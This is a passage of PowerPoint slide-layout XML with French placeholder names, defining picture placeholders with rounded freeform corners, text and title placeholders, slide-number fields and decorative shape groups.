                  <a:pt x="12156270" y="3404788"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11992285" y="4206159"/>
                  <a:pt x="11283233" y="4808981"/>
                  <a:pt x="10433383" y="4808981"/>
                </a:cubicBez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32" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB9433B4-F8DB-4ED2-BDB4-0BB93020D356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19"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834CB75C-5E80-4680-8D74-A376E9571B8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Image 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C88CBB15-22E7-4FCA-8C3B-95A31E1C83F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7" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D27432D1-9381-4A56-A209-29C0F6DDCB56}"/>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8" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87C12CAB-3898-4E3D-991D-91ADB1C422BC}"/>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16" name="Groupe 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8390CFA8-D732-4DE6-B62C-07D1BA94F588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B6B449F-4108-4252-A56E-1D7F88097E58}"/>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0" name="Rectangle 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{745D2919-20D7-4A16-BE4B-39A73A011B93}"/>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1" name="Groupe 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F6B85C3-DC20-49F0-AB67-C4D97CAF58A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="1886665"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="7045594" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Groupe 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6D016DF-50D9-4967-BF78-706E25959B2F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7045594" y="2588002"/>
              <a:ext cx="1885826" cy="1681996"/>
              <a:chOff x="2689543" y="1651754"/>
              <a:chExt cx="1885826" cy="1681996"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2706888A-1522-47B3-AF94-D7EC1210D296}"/>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1" name="Rectangle 30">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{096E1CAA-6208-4A54-A150-BE3526AD9F85}"/>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23" name="Image 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBDB5E21-DA6A-41E5-A5B1-4692BB64CB5D}"/>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24" name="Image 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCBE7F1D-037F-45D1-9EA6-7879EE60E4C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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Groupe 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B7A6516-C39B-4965-8ACE-00CBB6AEC2AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17DF3B85-73BC-43D2-BAD0-BF8D1E04670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5" name="Rectangle 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8678EC14-A56F-4CC9-840C-9C3285901243}"/>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68994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 Big Pictures">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Espace réservé pour une image  36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B0F75CD-3EC9-44BF-BAC1-17653420EA78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2" y="1458413"/>
            <a:ext cx="5886156" cy="4808981"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5886156"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4808981"/>
              <a:gd name="connsiteX1" fmla="*/ 5886156 w 5886156"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 4808981"/>
              <a:gd name="connsiteX2" fmla="*/ 5886156 w 5886156"/>
              <a:gd name="connsiteY2" fmla="*/ 4808981 h 4808981"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 5886156"/>
              <a:gd name="connsiteY3" fmla="*/ 4808981 h 4808981"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5886156" h="4808981">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5886156" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5886156" y="4808981"/>
                </a:ln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21" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1DF677B-5AAC-478C-B37D-2AB88979481F}"/>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2" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51DA9308-AED1-4D51-9532-29D348088321}"/>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3" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C333E5-C782-4B60-A14D-EB1ACA0A4E91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20"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F9E45E49-2217-4A05-AF54-D210897DD344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Image 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1163A07-9C15-407F-92FB-21DE12D95C5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39" name="Espace réservé pour une image  38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E79B415-F6F5-4D92-BDC1-FC8947E1CE8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057899" y="1458413"/>
            <a:ext cx="6134102" cy="4808981"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6134102"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4808981"/>
              <a:gd name="connsiteX1" fmla="*/ 6134102 w 6134102"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 4808981"/>
              <a:gd name="connsiteX2" fmla="*/ 6134102 w 6134102"/>
              <a:gd name="connsiteY2" fmla="*/ 3050377 h 4808981"/>
              <a:gd name="connsiteX3" fmla="*/ 6098374 w 6134102"/>
              <a:gd name="connsiteY3" fmla="*/ 3404788 h 4808981"/>
              <a:gd name="connsiteX4" fmla="*/ 4375487 w 6134102"/>
              <a:gd name="connsiteY4" fmla="*/ 4808981 h 4808981"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 6134102"/>
              <a:gd name="connsiteY5" fmla="*/ 4808981 h 48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34102" h="4808981">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6134102" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6134102" y="3050377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6098374" y="3404788"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5934389" y="4206159"/>
                  <a:pt x="5225337" y="4808981"/>
                  <a:pt x="4375487" y="4808981"/>
                </a:cubicBez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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Groupe 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F480C557-C2C0-44C8-A254-4EE49FA147C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5C6BD0C-2247-4BB8-9646-B031CC3BBAD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8" name="Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42EF4FF4-1FC6-412A-8518-7DFDA5ADD029}"/>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19" name="Groupe 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B22199A-E4DA-4ACF-B23A-B582017F83D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D151051A-3CE8-45D2-8F80-FE358A2D5FB0}"/>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3" name="Rectangle 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B47921B2-75B3-4D55-9319-85E6A8771002}"/>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132173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3 Big Pictures">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Espace réservé pour une image  39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31FE2C35-0D6F-4DAD-8E23-5AFBA4FCFC94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8179916" y="1458413"/>
            <a:ext cx="4012085" cy="4808981"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4012085"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4808981"/>
              <a:gd name="connsiteX1" fmla="*/ 4012085 w 4012085"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 4808981"/>
              <a:gd name="connsiteX2" fmla="*/ 4012085 w 4012085"/>
              <a:gd name="connsiteY2" fmla="*/ 3050377 h 4808981"/>
              <a:gd name="connsiteX3" fmla="*/ 3976357 w 4012085"/>
              <a:gd name="connsiteY3" fmla="*/ 3404788 h 4808981"/>
              <a:gd name="connsiteX4" fmla="*/ 2253470 w 4012085"/>
              <a:gd name="connsiteY4" fmla="*/ 4808981 h 4808981"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 4012085"/>
              <a:gd name="connsiteY5" fmla="*/ 4808981 h 48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12085" h="4808981">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4012085" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4012085" y="3050377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3976357" y="3404788"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3812372" y="4206159"/>
                  <a:pt x="3103320" y="4808981"/>
                  <a:pt x="2253470" y="4808981"/>
                </a:cubicBez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38" name="Espace réservé pour une image  37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32D9F265-3438-4C6E-8FB0-6D0417CBCC0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143139" y="1458413"/>
            <a:ext cx="3898176" cy="4808981"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3898176"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4808981"/>
              <a:gd name="connsiteX1" fmla="*/ 3898176 w 3898176"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 4808981"/>
              <a:gd name="connsiteX2" fmla="*/ 3898176 w 3898176"/>
              <a:gd name="connsiteY2" fmla="*/ 4808981 h 4808981"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 3898176"/>
              <a:gd name="connsiteY3" fmla="*/ 4808981 h 4808981"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3898176" h="4808981">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3898176" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3898176" y="4808981"/>
                </a:ln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31" name="Espace réservé pour une image  30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DB52938-D236-4B61-9683-7A4233895458}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3" y="1458413"/>
            <a:ext cx="4012083" cy="4808981"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4012083"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4808981"/>
              <a:gd name="connsiteX1" fmla="*/ 4012083 w 4012083"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 4808981"/>
              <a:gd name="connsiteX2" fmla="*/ 4012083 w 4012083"/>
              <a:gd name="connsiteY2" fmla="*/ 4808981 h 4808981"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 4012083"/>
              <a:gd name="connsiteY3" fmla="*/ 4808981 h 4808981"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4012083" h="4808981">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4012083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4012083" y="4808981"/>
                </a:ln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3" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5FDB967-0680-4E87-B657-769C3717F8C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21"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2F8C7D36-4A01-4436-82C7-7D5A2DF5C9FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Image 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{599C3D43-B0AA-4DBC-A7BB-A1954E4D4E7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8" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A47798D5-D4F7-41BD-A097-4616F73700AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533399"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9" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB611C61-A7E9-457E-ACCD-DC1D97430EC9}"/>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17" name="Groupe 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403B02FB-A9E3-47FE-A21E-0EB0480BB280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC977E76-E6DA-4349-8B41-25A9E358F54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1" name="Rectangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF2C4D22-9D29-489A-BBF6-1EC1C7894B5D}"/>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2" name="Groupe 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D3D505B-EF6B-48EC-A85C-C6C6DB1F899A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D181768-4A99-42A0-B485-3FCC7CC83C2E}"/>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4" name="Rectangle 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA2BC956-9DD1-48A5-98E9-2A6245E67773}"/>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3215694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Subtitle + Txt">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56B06170-AF06-4468-96E7-0D2036A367AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17"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8" name="Espace réservé du numéro de diapositive 7">
            <a:extLst>
